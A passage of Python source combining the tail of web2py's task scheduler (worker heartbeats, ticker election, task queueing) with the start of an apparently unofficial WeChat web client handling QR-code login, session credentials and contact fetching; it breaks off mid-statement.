) logger.info('task completed (%s)', task_report.status) def update_dependencies(self, task_id): """Unblock execution paths for Jobs.""" db = self.db db(db.scheduler_task_deps.task_child == task_id).update(can_visit=True) def adj_hibernation(self): """Used to increase the "sleep" interval for DISABLED workers.""" with self.w_stats_lock: if self.w_stats.status == DISABLED: wk_st = self.w_stats.sleep hibernation = wk_st + HEARTBEAT if wk_st < MAXHIBERNATION else MAXHIBERNATION self.w_stats.sleep = hibernation def send_heartbeat(self, counter): """Coordination among available workers. It: - sends the heartbeat - elects a ticker among available workers (the only process that effectively dispatch tasks to workers) - deals with worker's statuses - does "housecleaning" for dead workers - triggers tasks assignment to workers """ if self.db_thread: # BKR 20180612 check if connection still works try: self.db_thread(self.db_thread.scheduler_worker).count() except self.db_thread._adapter.connection.OperationalError: # if not -> throw away self.db_thread and force reconnect self.db_thread = None if not self.db_thread: logger.debug('thread building own DAL object') self.db_thread = DAL( self.db._uri, folder=self.db._adapter.folder, decode_credentials=True) self.define_tables(self.db_thread, migrate=False) try: now = self.now() db = self.db_thread sw = db.scheduler_worker st = db.scheduler_task # record heartbeat row = db(sw.worker_name == self.worker_name).select().first() with self.w_stats_lock: if not row: sw.insert(status=ACTIVE, worker_name=self.worker_name, first_heartbeat=now, last_heartbeat=now, group_names=self.group_names, worker_stats=self.w_stats) self.w_stats.status = ACTIVE self.w_stats.sleep = self.heartbeat backed_status = ACTIVE else: backed_status = row.status if backed_status == DISABLED: # keep sleeping self.w_stats.status = DISABLED logger.debug('........recording heartbeat (DISABLED)') db(sw.worker_name == self.worker_name).update( last_heartbeat=now, worker_stats=self.w_stats) elif backed_status == TERMINATE: self.w_stats.status = TERMINATE logger.debug("Waiting to terminate the current task") self.give_up() elif backed_status == KILL: self.w_stats.status = KILL self.die() return else: if backed_status == STOP_TASK: logger.info('Asked to kill the current task') self.terminate_process() logger.debug('........recording heartbeat (%s)', self.w_stats.status) db(sw.worker_name == self.worker_name).update( last_heartbeat=now, status=ACTIVE, worker_stats=self.w_stats) self.w_stats.sleep = self.heartbeat # re-activating the process if self.w_stats.status != RUNNING: self.w_stats.status = ACTIVE self.do_assign_tasks = False if counter % 5 == 0 or backed_status == PICK: try: # delete dead workers expiration = now - datetime.timedelta( seconds=self.heartbeat * 3) departure = now - datetime.timedelta( seconds=self.heartbeat * 3 * 15) logger.debug( ' freeing workers that have not sent heartbeat') dead_workers = db( ((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) | ((sw.last_heartbeat < departure) & (sw.status != ACTIVE)) ) dead_workers_name = dead_workers._select(sw.worker_name) db( (st.assigned_worker_name.belongs(dead_workers_name)) & (st.status == RUNNING) ).update(assigned_worker_name='', status=QUEUED) dead_workers.delete() try: self.is_a_ticker = self.being_a_ticker() except: logger.exception('Error coordinating TICKER') with self.w_stats_lock: if self.w_stats.status == ACTIVE: self.do_assign_tasks = True except: logger.exception('Error cleaning up') db.commit() except: logger.exception('Error retrieving status') db.rollback() self.adj_hibernation() self.sleep() def being_a_ticker(self): """Elect a TICKER process that assigns tasks to available workers. Does its best to elect a worker that is not busy processing other tasks to allow a proper distribution of tasks among all active workers ASAP """ db = self.db_thread sw = db.scheduler_worker my_name = self.worker_name all_active = db( (sw.worker_name != my_name) & (sw.status == ACTIVE) ).select(sw.is_ticker, sw.worker_name) ticker = all_active.find(lambda row: row.is_ticker is True).first() with self.w_stats_lock: not_busy = self.w_stats.status == ACTIVE if not ticker: # if no other tickers are around if not_busy: # only if I'm not busy db(sw.worker_name == my_name).update(is_ticker=True) db(sw.worker_name != my_name).update(is_ticker=False) logger.info("TICKER: I'm a ticker") else: # I'm busy if len(all_active) >= 1: # so I'll "downgrade" myself to a "poor worker" db(sw.worker_name == my_name).update(is_ticker=False) else: not_busy = True db.commit() return not_busy else: logger.info( "%s is a ticker, I'm a poor worker" % ticker.worker_name) return False def wrapped_assign_tasks(self): """Commodity function to call `assign_tasks` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `assign_task` after 0.5 seconds """ logger.debug('Assigning tasks...') db = self.db db.commit() # for MySQL only; FIXME: Niphlod, still needed? could avoid when not MySQL? for x in range(10): try: self.assign_tasks() db.commit() logger.debug('Tasks assigned...') break except Exception: logger.exception('TICKER: error assigning tasks') self.w_stats.errors += 1 db.rollback() time.sleep(0.5) def assign_tasks(self): """Assign task to workers, that can then pop them from the queue. Deals with group_name(s) logic, in order to assign linearly tasks to available workers for those groups """ now = self.now() db = self.db sw = db.scheduler_worker st = db.scheduler_task sd = db.scheduler_task_deps all_workers = db(sw.status == ACTIVE).select() # build workers as dict of groups wkgroups = {} for w in all_workers: if w.worker_stats['status'] == 'RUNNING': continue group_names = w.group_names for gname in group_names: if gname not in wkgroups: wkgroups[gname] = dict( workers=[{'name': w.worker_name, 'c': 0}]) else: wkgroups[gname]['workers'].append( {'name': w.worker_name, 'c': 0}) # set queued tasks that expired between "runs" (i.e., you turned off # the scheduler): then it wasn't expired, but now it is db( (st.status.belongs((QUEUED, ASSIGNED))) & (st.stop_time < now) ).update(status=EXPIRED) # calculate dependencies deps_with_no_deps = db( (sd.can_visit == False) & (~sd.task_child.belongs( db(sd.can_visit == False)._select(sd.task_parent) ) ) )._select(sd.task_child) no_deps = db( (st.status.belongs((QUEUED, ASSIGNED))) & ( (sd.id == None) | (st.id.belongs(deps_with_no_deps)) ) )._select(st.id, distinct=True, left=sd.on( (st.id == sd.task_parent) & (sd.can_visit == False) ) ) all_available = db( (st.status.belongs((QUEUED, ASSIGNED))) & (st.next_run_time <= now) & (st.enabled == True) & (st.id.belongs(no_deps)) ) limit = len(all_workers) * (50 / (len(wkgroups) or 1)) # if there are a moltitude of tasks, let's figure out a maximum of # tasks per worker. This can be further tuned with some added # intelligence (like esteeming how many tasks will a worker complete # before the ticker reassign them around, but the gain is quite small # 50 is a sweet spot also for fast tasks, with sane heartbeat values # NB: ticker reassign tasks every 5 cycles, so if a worker completes # its 50 tasks in less than heartbeat*5 seconds, # it won't pick new tasks until heartbeat*5 seconds pass. # If a worker is currently elaborating a long task, its tasks needs to # be reassigned to other workers # this shuffles up things a bit, in order to give a task equal chances # to be executed # let's freeze it up db.commit() tnum = 0 for group in wkgroups.keys(): tasks = all_available(st.group_name == group).select( limitby=(0, limit), orderby=st.next_run_time) # let's break up the queue evenly among workers for task in tasks: tnum += 1 gname = task.group_name ws = wkgroups.get(gname) if ws: if task.broadcast: for worker in ws['workers']: new_task = db.scheduler_task.insert( application_name=task.application_name, task_name=task.task_name, group_name=task.group_name, status=ASSIGNED, broadcast=False, function_name=task.function_name, args=task.args, start_time=now, repeats=1, retry_failed=task.retry_failed, sync_output=task.sync_output, assigned_worker_name=worker['name']) if task.period: next_run_time = now + datetime.timedelta(seconds=task.period) else: # must be cronline cron_recur = CronParser(task.cronline, now.replace(second=0, microsecond=0)) next_run_time = cron_recur.next() db(st.id == task.id).update(times_run=task.times_run + 1, next_run_time=next_run_time, last_run_time=now) db.commit() else: counter = 0 myw = 0 for i, w in enumerate(ws['workers']): if w['c'] < counter: myw = i counter = w['c'] assigned_wn = wkgroups[gname]['workers'][myw]['name'] d = dict( status=ASSIGNED, assigned_worker_name=assigned_wn ) db( (st.id == task.id) & (st.status.belongs((QUEUED, ASSIGNED))) ).update(**d) wkgroups[gname]['workers'][myw]['c'] += 1 db.commit() # I didn't report tasks but I'm working nonetheless!!!! with self.w_stats_lock: if tnum > 0: self.w_stats.empty_runs = 0 self.w_stats.queue = tnum self.w_stats.distribution = wkgroups self.w_stats.workers = len(all_workers) # I'll be greedy only if tasks assigned are equal to the limit # (meaning there could be others ready to be assigned) self.greedy = tnum >= limit logger.info('TICKER: workers are %s', len(all_workers)) logger.info('TICKER: tasks are %s', tnum) def sleep(self): """Calculate the number of seconds to sleep.""" time.sleep(self.w_stats.sleep) # should only sleep until next available task def set_worker_status(self, group_names=None, action=ACTIVE, exclude=None, limit=None, worker_name=None): """Internal function to set worker's status.""" db = self.db ws = db.scheduler_worker if not group_names: group_names = self.group_names elif isinstance(group_names, str): group_names = [group_names] if worker_name: db(ws.worker_name == worker_name).update(status=action) return exclusion = exclude and exclude.append(action) or [action] if not limit: for group in group_names: db( (ws.group_names.contains(group)) & (~ws.status.belongs(exclusion)) ).update(status=action) else: for group in group_names: workers = db((ws.group_names.contains(group)) & (~ws.status.belongs(exclusion)) )._select(ws.id, limitby=(0, limit)) db(ws.id.belongs(workers)).update(status=action) def disable(self, group_names=None, limit=None, worker_name=None): """Set DISABLED on the workers processing `group_names` tasks. A DISABLED worker will be kept alive but it won't be able to process any waiting tasks, essentially putting it to sleep. By default, all group_names of Scheduler's instantation are selected """ self.set_worker_status( group_names=group_names, action=DISABLED, exclude=[DISABLED, KILL, TERMINATE], limit=limit) def resume(self, group_names=None, limit=None, worker_name=None): """Wakes a worker up (it will be able to process queued tasks)""" self.set_worker_status( group_names=group_names, action=ACTIVE, exclude=[KILL, TERMINATE], limit=limit) def terminate(self, group_names=None, limit=None, worker_name=None): """Sets TERMINATE as worker status. The worker will wait for any currently running tasks to be executed and then it will exit gracefully """ self.set_worker_status( group_names=group_names, action=TERMINATE, exclude=[KILL], limit=limit) def kill(self, group_names=None, limit=None, worker_name=None): """Sets KILL as worker status. The worker will be killed even if it's processing a task.""" self.set_worker_status( group_names=group_names, action=KILL, limit=limit) def queue_task(self, function, pargs=[], pvars={}, **kwargs): """ Queue tasks. This takes care of handling the validation of all parameters Args: function: the function (anything callable with a __name__) pargs: "raw" args to be passed to the function. Automatically jsonified. pvars: "raw" kwargs to be passed to the function. Automatically jsonified kwargs: all the parameters available (basically, every `scheduler_task` column). If args and vars are here, they should be jsonified already, and they will override pargs and pvars Returns: a dict just as a normal validate_and_insert(), plus a uuid key holding the uuid of the queued task. If validation is not passed ( i.e. some parameters are invalid) both id and uuid will be None, and you'll get an "error" dict holding the errors found. """ if hasattr(function, '__name__'): function = function.__name__ targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs) tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars) tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid() tname = 'task_name' in kwargs and kwargs.pop('task_name') or function immediate = 'immediate' in kwargs and kwargs.pop('immediate') or None cronline = kwargs.get('cronline') kwargs.update( function_name=function, task_name=tname, args=targs, vars=tvars, uuid=tuuid, ) if cronline: try: start_time = kwargs.get('start_time', self.now) next_run_time = CronParser(cronline, start_time).next() kwargs.update(start_time=start_time, next_run_time=next_run_time) except Exception: pass if 'start_time' in kwargs and 'next_run_time' not in kwargs: kwargs.update(next_run_time=kwargs['start_time']) db = self.db rtn = db.scheduler_task.validate_and_insert(**kwargs) if not rtn.errors: rtn.uuid = tuuid if immediate: db( (db.scheduler_worker.is_ticker == True) ).update(status=PICK) else: rtn.uuid = None return rtn def task_status(self, ref, output=False): """ Retrieves task status and optionally the result of the task Args: ref: can be - an integer : lookup will be done by scheduler_task.id - a string : lookup will be done by scheduler_task.uuid - a `Query` : lookup as you wish, e.g. :: db.scheduler_task.task_name == 'test1' output(bool): if `True`, fetch also the scheduler_run record Returns: a single Row object, for the last queued task. If output == True, returns also the last scheduler_run record. The scheduler_run record is fetched by a left join, so it can have all fields == None """ from pydal.objects import Query db = self.db sr = db.scheduler_run st = db.scheduler_task if isinstance(ref, integer_types): q = st.id == ref elif isinstance(ref, str): q = st.uuid == ref elif isinstance(ref, Query): q = ref else: raise SyntaxError( "You can retrieve results only by id, uuid or Query") fields = [st.ALL] left = False orderby = ~st.id if output: fields = st.ALL, sr.ALL left = sr.on(sr.task_id == st.id) orderby = ~st.id | ~sr.id row = db(q).select( *fields, **dict(orderby=orderby, left=left, limitby=(0, 1)) ).first() if row and output: row.result = row.scheduler_run.run_result and \ loads(row.scheduler_run.run_result, object_hook=_decode_dict) or None return row def stop_task(self, ref): """Shortcut for task termination. If the task is RUNNING it will terminate it, meaning that status will be set as FAILED. If the task is QUEUED, its stop_time will be set as to "now", the enabled flag will be set to False, and the status to STOPPED Args: ref: can be - an integer : lookup will be done by scheduler_task.id - a string : lookup will be done by scheduler_task.uuid Returns: - 1 if task was stopped (meaning an update has been done) - None if task was not found, or if task was not RUNNING or QUEUED Note: Experimental """ db = self.db st = db.scheduler_task sw = db.scheduler_worker if isinstance(ref, integer_types): q = st.id == ref elif isinstance(ref, str): q = st.uuid == ref else: raise SyntaxError( "You can retrieve results only by id or uuid") task = db(q).select(st.id, st.status, st.assigned_worker_name) task = task.first() rtn = None if not task: return rtn if task.status == 'RUNNING': q = sw.worker_name == task.assigned_worker_name rtn = db(q).update(status=STOP_TASK) elif task.status == 'QUEUED': rtn = db(q).update( stop_time=self.now(), enabled=False, status=STOPPED) return rtn def get_workers(self, only_ticker=False): """ Returns a dict holding `worker_name : {**columns}` representing all "registered" workers only_ticker returns only the workers running as a TICKER, if there are any """ db = self.db if only_ticker: workers = db(db.scheduler_worker.is_ticker == True).select() else: workers = db(db.scheduler_worker.id).select() all_workers = {} for row in workers: all_workers[row.worker_name] = Storage( status=row.status, first_heartbeat=row.first_heartbeat, last_heartbeat=row.last_heartbeat, group_names=row.group_names, is_ticker=row.is_ticker, worker_stats=row.worker_stats ) return all_workers def main(): """ allows to run worker without python web2py.py .... by simply:: python gluon/scheduler.py """ import optparse parser = optparse.OptionParser() parser.add_option( "-w", "--worker_name", dest="worker_name", default=None, help="start a worker with name") parser.add_option( "-b", "--heartbeat", dest="heartbeat", default=10, type='int', help="heartbeat time in seconds (default 10)") parser.add_option( "-L", "--logger_level", dest="logger_level", default=30, type='int', help="set debug output level (0-100, 0 means all, 100 means none;default is 30)") parser.add_option("-E", "--empty-runs", dest="max_empty_runs", type='int', default=0, help="max loops with no grabbed tasks permitted (0 for never check)") parser.add_option( "-g", "--group_names", dest="group_names", default='main', help="comma separated list of groups to be picked by the worker") parser.add_option( "-f", "--db_folder", dest="db_folder", default='/Users/mdipierro/web2py/applications/scheduler/databases', help="location of the dal database folder") parser.add_option( "-u", "--db_uri", dest="db_uri", default='sqlite://storage.sqlite', help="database URI string (web2py DAL syntax)") parser.add_option( "-t", "--tasks", dest="tasks", default=None, help="file containing task files, must define" + "tasks = {'task_name':(lambda: 'output')} or similar set of tasks") parser.add_option( "-U", "--utc-time", dest="utc_time", default=False, help="work with UTC timestamps" ) (options, args) = parser.parse_args() if not options.tasks or not options.db_uri: print(USAGE) if options.tasks: path, filename = os.path.split(options.tasks) if filename.endswith('.py'): filename = filename[:-3] sys.path.append(path) print('importing tasks...') tasks = __import__(filename, globals(), locals(), [], -1).tasks print('tasks found: ' + ', '.join(list(tasks.keys()))) else: tasks = {} group_names = [x.strip() for x in options.group_names.split(',')] logging.getLogger().setLevel(options.logger_level) print('groups for this worker: ' + ', '.join(group_names)) print('connecting to database in folder: ' + options.db_folder or './') print('using URI: ' + options.db_uri) db = DAL(options.db_uri, folder=options.db_folder, decode_credentials=True) print('instantiating scheduler...') scheduler = Scheduler(db=db, worker_name=options.worker_name, tasks=tasks, migrate=True, group_names=group_names, heartbeat=options.heartbeat, max_empty_runs=options.max_empty_runs, utc_time=options.utc_time) signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1)) print('starting main worker loop...') scheduler.loop() if __name__ == '__main__': main()
wechat.py
# -*- coding: utf-8 -*- import os import io import re import json import time import random import asyncio import logging import hashlib import unittest import functools import threading import mimetypes import concurrent.futures from pprint import pprint from urllib.parse import urlparse, unquote from collections import OrderedDict import aiohttp import requests import async_timeout from lxml import etree from pyqrcode import QRCode from requests.utils import cookiejar_from_dict def set_logger(name, level=logging.INFO): formatter = logging.Formatter('[%(levelname)1.1s %(asctime)s ' '%(module)s:%(lineno)d] %(message)s') stream_handler = logging.StreamHandler() stream_handler.formatter = formatter _logger = logging.getLogger(name) _logger.addHandler(stream_handler) _logger.setLevel(level) return _logger logger = set_logger('wechat') class NamedVKDict(object): """ usage: >>> country = NamedVKDict({'CHINA': 0, 'AMERICA': 1, 'BRITAIN': 2}) >>> country.CHINA >>> 0 >>> country[0] >>> 'CHINA' """ def __init__(self, value): self._attr = value self._index = {v: k for k, v in value.items()} def __getattr__(self, value): if value in self._attr: return self._attr[value] else: raise AttributeError def __getitem__(self, value): return self._index[value] def fix_emoji(val): """ _emoji_debugger is for bugs about emoji match caused by wechat backstage like :face with tears of joy: will be replaced with :cat face with tears of joy: """ def _emoji_debugger(val): s = val.replace('<span class="emoji emoji1f450"></span', '<span class="emoji emoji1f450"></span>') def __fix_miss_match(m): return '<span class="emoji emoji%s"></span>' % ({ '1f63c': '1f601', '1f639': '1f602', '1f63a': '1f603', '1f4ab': '1f616', '1f64d': '1f614', '1f63b': '1f60d', '1f63d': '1f618', '1f64e': '1f621', '1f63f': '1f622', }.get(m.group(1), m.group(1))) return WeChatMeta.RE['emoji'].sub(__fix_miss_match, s) def _emoji_formatter(m): s = m.group(1) if len(s) == 6: return ('\\U%s\\U%s'%(s[:2].rjust(8, '0'), s[2:].rjust(8, '0')))\ .encode('utf8').decode('unicode-escape', 'replace') elif len(s) == 10: return ('\\U%s\\U%s'%(s[:5].rjust(8, '0'), s[5:].rjust(8, '0')))\ .encode('utf8').decode('unicode-escape', 'replace') else: return ('\\U%s'%m.group(1).rjust(8, '0'))\ .encode('utf8').decode('unicode-escape', 'replace') val = _emoji_debugger(val) val = WeChatMeta.RE['emoji'].sub(_emoji_formatter, val) return val ############## # Exceptions # ############## class WeChatError(Exception): pass class LoginFailedError(WeChatError): pass class MultiListenThreadError(WeChatError): pass class MessageDataCorruptionError(WeChatError): pass class WeChatMeta(object): APP_ID = 'wx782c26e4c19acffb' # Got from itChat GROUP_PREFIX = '@@' INVITE_BY_MYSELF = '你' MP_FLAG = 'gh_' COOKIE_DOMAIN = '.qq.com' TIME_FORMAT = '%a %b %d %Y %H:%M:%S GMT+0800 (CST)' FILE_MESSAGE_TEMPLATE = ( "<appmsg appid='{}' sdkver=''><title>{}</title><des></des><action>" "</action><type>6</type><content></content><url></url><lowurl>" "</lowurl><appattach><totallen>{}</totallen><attachid>{}</attachid>" "<fileext>{}</fileext></appattach><extinfo></extinfo></appmsg>" ) LOGIN_URI = 'https://login.weixin.qq.com' URL = { 'uuid': LOGIN_URI + '/jslogin', 'push_login': LOGIN_URI + '/cgi-bin/mmwebwx-bin/webwxpushloginurl', 'login_status': LOGIN_URI + '/cgi-bin/mmwebwx-bin/login', 'qr_code': LOGIN_URI + '/l/', 'upload_media': '/webwxuploadmedia', 'sync_check': '/synccheck', 'web_sync': '/webwxsync', 'web_init': '/webwxinit', 'web_status': '/webwxstatusnotify', 'get_contacts': '/webwxgetcontact', 'bget_contacts': '/webwxbatchgetcontact', 'send_message': '/webwxsendmsg', 'send_image': '/webwxsendmsgimg', 'send_video': '/webwxsendvideomsg', 'send_file': '/webwxsendappmsg', 'update_group': '/webwxupdatechatroom', 'create_group': '/webwxcreatechatroom', 'set_pin': '/webwxoplog', 'group_avatar': '/webwxgetheadimg', 'user_avatar': '/webwxgeticon', } RE = { 'uuid': re.compile(r'QRLogin\.uuid = "(?P<uuid>\S+)"'), 'login_status': re.compile(r'window\.code=(?P<status>\d+)'), 'main_uri': re.compile(r'window.redirect_uri="(?P<main_uri>\S+)"'), 'uin': re.compile(r'<username>(?P<uin>[^<]*?)<'), 'sync_check': re.compile(r'synccheck=\{retcode:"(?P<retcode>\d+)",' r'selector:"(?P<selector>\d+)"\}'), 'group_msg': re.compile(u'(?P<username>@[0-9a-z]+):<br/>' u'(@(?P<nickname>.*?)\u2005)?' u'(?P<content>.*)'), 'invite': re.compile('.*?(邀请"(?P<invitee1>.*?)"|' '"(?P<invitee2>.*?)"通过)'), 'remove': re.compile('"(?P<nickname>.*?)"移出了群聊'), 'emoji': re.compile(r'<span class="emoji emoji(.{1,10})"></span>'), } MESSAGE_TYPE = NamedVKDict({ 'TEXT': 1, 'IMAGE': 3, 'FILE': 6, 'CONTACT_CARD': 42, 'VIDEO': 43, 'SHARE': 49, 'INITIALIZE': 51, 'SYSTEM': 10000, }) class Contact(object): RAW_FIELD = ['UserName', 'NickName', 'MemberList', 'DisplayName'] def __init__(self, raw_contact=None, account=None, is_group=False, dumps=None): self.__bool = False or bool(raw_contact) if dumps or not self.__bool: return member_list = raw_contact.get('MemberList', []) self.account = account self.user_id = raw_contact['UserName'] self.nickname = fix_emoji(raw_contact['NickName']) self.display_name = fix_emoji(raw_contact.get('DisplayName', '')) self.is_owner = self._is_owner(member_list) self.members = self.process_members(member_list) self.is_group = is_group @property def avatar(self): return self.account.get_avatar(self.user_id) def process_members(self, members): return {m['UserName']: Contact(m, self.account) for m in members} def _is_owner(self, members): if not members: return False return members[0]['UserName'] == self.account.username @classmethod def is_data_corruption(cls, raw_contact): if not raw_contact: return True for field in cls.RAW_FIELD: if field not in raw_contact: return True return True def dump(self, avatar=False): contact = { 'user_id': self.user_id, 'nickname': self.nickname, 'display_name': self.display_name, 'is_owner': self.is_owner, 'is_group': self.is_group, 'members': { user_id: member.dump(avatar) for user_id, member in self.members.items() }, 'account': { 'username': self.account.username, 'nickname': self.account.nickname, 'uin': self.account.uin, }, } if avatar: avatar_bin = self.account.get_avatar(self.user_id) contact['avatar_md5'] = hashlib.md5(avatar_bin).hexdigest() return contact @classmethod def load(cls, dump, account=None): if not isinstance(dump, dict): contact = json.loads(dump) contact = cls(dumps=True) contact.account = account contact.user_id = dump['user_id'] contact.nickname = dump['nickname'] contact.display_name = dump['display_name'] contact.is_owner = dump['is_owner'] contact.is_group = dump['is_group'] contact.members = { user_id: cls.load(member, account) for user_id, member in dump['members'].items() } return contact def __bool__(self): return self.__bool class WeChatClient(object): HEADERS = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) ' 'AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/58.0.3029.110 Safari/537.36', } CHUNK_SIZE = 1024 * 512 # 512KB def __init__(self, credential=None): self.login = False self._alive = False self.uuid = None self.login_info = {} self.invite_start_count = 40 self.session = requests.Session() self.session.headers = self.HEADERS self.friends = {} self.groups = {} self.mp = {} self.logout_callback = [] self.message_callback = {} self.credential_update_callback = [] self.group_update_callback = {} self.tick_hooks = {} self.uin = None self.username = None self.nickname = None self.alias = None self._listen_thread = None self.listening = False if credential: self.load_credential(credential) @property def alive(self): return bool(self._alive and self.listen_thread and self.listen_thread.isAlive()) @property def listen_thread(self): return self._listen_thread @listen_thread.setter def listen_thread(self, value): if self.listen_thread and self.listen_thread.isAlive(): raise MultiListenThreadError self._listen_thread = value ################## # login & logout # ################## def login_by_qrcode(self, timeout=180, thread=False, callback=None): def polling(): start_time = time.time() while not self.login: if time.time() - start_time > timeout: return self.login self.login = self._polling_login() time.sleep(0.1) self._login_init() self._alive = True if callback: self._run_callback([callback]) self.listen_message() return self.login if not thread: return polling() polling_thread = threading.Thread(target=polling) polling_thread.setDaemon(True) polling_thread.start() def print_cli_qrcode(self): self.uuid = self.get_login_uuid() qr_code = QRCode(WeChatMeta.URL['qr_code'] + self.uuid) qr_code.svg('uca-url.svg', scale=6) print(qr_code.terminal(quiet_zone=1)) @classmethod def get_login_uuid(cls): resp = requests.get( WeChatMeta.URL['uuid'], params={'appid': WeChatMeta.APP_ID, 'fun': 'new'} ) result = WeChatMeta.RE['uuid'].search(resp.text) assert result, 'Failed get uuid from {}'.format(WeChatMeta.URL['uuid']) return result.group('uuid') @classmethod def generate_qrcode(cls, uuid): qr_storage = io.BytesIO() qr_code = QRCode(WeChatMeta.URL['qr_code'] + uuid) qr_code.svg(qr_storage, scale=10) return qr_storage.getvalue() def get_qrcode(self): self.uuid = self.get_login_uuid() return self.generate_qrcode(self.uuid) def _polling_login(self): if not self.uuid: return False timestamp = int(time.time()) params = { 'uuid': self.uuid, 'loginicon': True, 'tip': 0, 'r': timestamp / 1579, # Magic number: 1579, from ItChat '_': timestamp } resp = self.session.get(WeChatMeta.URL['login_status'], params=params) result = WeChatMeta.RE['login_status'].search(resp.text) if not result: return False status = result.group('status') if status != '200': return False else: self._extract_login_credential(resp.text) return True def _extract_login_credential(self, content): result = WeChatMeta.RE['main_uri'].search(content) if not result: raise LoginFailedError('Failed extract redirect uri ' 'after login success') redirect_uri = result.group('main_uri') resp = self.session.get(redirect_uri, allow_redirects=False) credit = self.login_info resp_xml = etree.fromstring(resp.text) parsed_uri = urlparse(redirect_uri) essentials = (parsed_uri.scheme, parsed_uri.netloc, parsed_uri.path[:parsed_uri.path.rfind('/')]) credit['main_uri'] = '{}://{}{}'.format(*essentials) credit['upload_uri'] = '{}://file.{}{}'.format(*essentials) credit['web_sync_uri'] = '{}://webpush.{}{}'.format(*essentials) credit['deviceid'] = 'e' + repr(random.random())[2:17] try: br = credit['base_request'] = {'DeviceID': credit['deviceid']} credit['skey'] = br['Skey'] = resp_xml.xpath('//skey')[0].text credit['wxsid'] = br['Sid'] = resp_xml.xpath('//wxsid')[0].text credit['wxuin'] = resp_xml.xpath('//wxuin')[0].text br['Uin'] = int(credit['wxuin']) credit['pass_ticket'] = unquote( resp_xml.xpath('//pass_ticket')[0].text ) self.uin = credit['wxuin'] except TypeError: self.login_info = {} raise LoginFailedError( 'Failed extract login credential from login xml' ) def _web_init(self): url = self.login_info['main_uri'] + WeChatMeta.URL['web_init'] resp = self.session.post( url, params={'r': int(time.time())}, json={'BaseRequest': self.login_info['base_request']} ) result = self._decode_content(resp.content) credit = self.login_info credit['sync_check_key'] = result['SyncKey'] self.username = fix_emoji(result['User']['UserName']) self.nickname = fix_emoji(result['User']['NickName']) self.invite_start_count = int(result['InviteStartCount']) self.save_credential() def _get_initialize_contacts(self): url = self.login_info['main_uri'] + WeChatMeta.URL['web_status'] params = { 'lang': 'zh_CN', 'pass_ticket': self.login_info['pass_ticket'], } data = { 'BaseRequest': self.login_info['base_request'], 'Code': 3, 'FromUserName': self.username, 'ToUserName': self.username, 'ClientMsgId': int(time.time()), } resp = self.session.post(url, params=params, json=data) return resp.json()['BaseResponse']['Ret'] == 0 def _get_all_contacts(self): url = self.login_info['main_uri'] + WeChatMeta.URL['get_contacts'] def fetch_fragment(seq=0): contacts = [] params = { 'r': int(time.time()), 'seq': seq, 'skey': self.login_info['skey'], } resp = self.session.get(url, params=params) data = self._decode_content(resp.content) contacts.extend(data.get('MemberList', [])) new_seq = data.get('Seq', 0) if new_seq != 0: contacts.extend(fetch_fragment(new_seq)) else: return contacts all_contacts = fetch_fragment() self._process_contacts_change(all_contacts) def _login_init(self): self._web_init() self._get_initialize_contacts() self._get_all_contacts() def export_credential(self): return { 'cookies': self.session.cookies.get_dict(), 'login_info': self.login_info, 'username': self.username, 'nickname': self.nickname, 'uin': self.uin, } def load_credential(self, credential): self.login_info = credential['login_info'] self.session.cookies = cookiejar_from_dict(credential['cookies']) self.uin = self.login_info['wxuin'] self.nickname = credential['nickname'] self.username = credential['username'] def login_by_credential(self, credential=None): if credential: self.load_credential(credential) cookies = self.session.cookies.get_dict() cookies.update({ 'login_frequency': '2', 'last_wxuin': self.login_info['wxuin'], 'MM_WX_NOTIFY_STATE': '1', 'MM_WX_SOUND_STATE': '1', }) self.session.cookies = cookiejar_from_dict(cookies) success, message, contacts = self._fetch_server_change() if success: self.login = True self._alive = True self._login_init() self.listen_message() return True else: return False def _push_login(self): uin = self.login_info['wxuin'] resp = self.session.get(WeChatMeta.URL['push_login'], params={'uin': uin}) result = resp.json() if 'uuid' in result and str(result.get('ret')) == '0': self.uuid = result['uuid'] return True else: return False def logout(self): self._alive = False self.login = False old_listen_thread = self._listen_thread del old_listen_thread self._listen_thread = None for cb in self.logout_callback: cb(self) ################# # Contacts data # ################# def save_group(self, group): if not group: return self._run_callback(self.group_update_callback, group) self.groups[group.user_id] = group def get_group_by_username(self, username, force_remote=False): if force_remote or username not in self.groups: group = self._query_entity(username) if not group: return None self.save_group(group) return self.groups[username] def get_group_by_nickname(self, nickname): for group_id, group in self.groups.items(): if group.nickname == nickname: return group def get_group_member(self, group_id, user_id): group = self.get_group_by_username(group_id) if not group: return None return group.members.get(user_id) @classmethod def _process_fetch(cls, session, req): return cls._decode_content(session.post(**req).content) def _build_username_req(self, user_ids, group_id): if not group_id: request_list = [ {'UserName': user, 'EncryChatRoomId': ''} for user in user_ids ] else: request_list = [ {'UserName': user, 'EncryChatRoomId': group_id} for user in user_ids ] return { 'url': self.login_info['main_uri'] + WeChatMeta.URL['bget_contacts'], 'params': {'type': 'ex', 'r': int(time.time())}, 'data': json.dumps({ 'BaseRequest': self.login_info['base_request'], 'Count': len(user_ids), 'List': request_list, }) } def _query_entity(self, username): result = self._query_entities([username]) return result[0] if result else {} def _query_entities(self, user_ids): try: loop = asyncio.get_event_loop() except RuntimeError: loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) def package_req(items, group_id=None): reqs = [] for i in range(len(items)//50 + 1): seg = items[i*50: (i+1) * 50] reqs.append(self._build_username_req(seg, group_id)) return reqs def do_request(reqs, groups=None): with concurrent.futures.ProcessPoolExecutor() as executor: result = list(executor.map( self._process_fetch, [self.session] * len(reqs), reqs) ) return zip(result, groups) if groups else result # FIXME: async request work not meeting expectations async def _fetch(req): cookies = self.session.cookies.get_dict() try: with async_timeout.timeout(100): async with aiohttp.ClientSession( loop=loop, cookies=cookies, headers=self.HEADERS) as session: async with session.post(**req) as res: res = await res.text(encoding='utf-8') return json.loads(res) except asyncio.TimeoutError as err: logger.error('Failed get req: {} response, ' 'err: {}'.format(req, err)) except Exception as err: logger.error('*** Terrible things happened ***, ' 'error: {}'.format(err)) def do_async_request(reqs, groups=None): futures = [_fetch(r) for r in reqs] result = loop.run_until_complete(asyncio.gather(*futures)) return zip(result, groups) if groups else result resp = 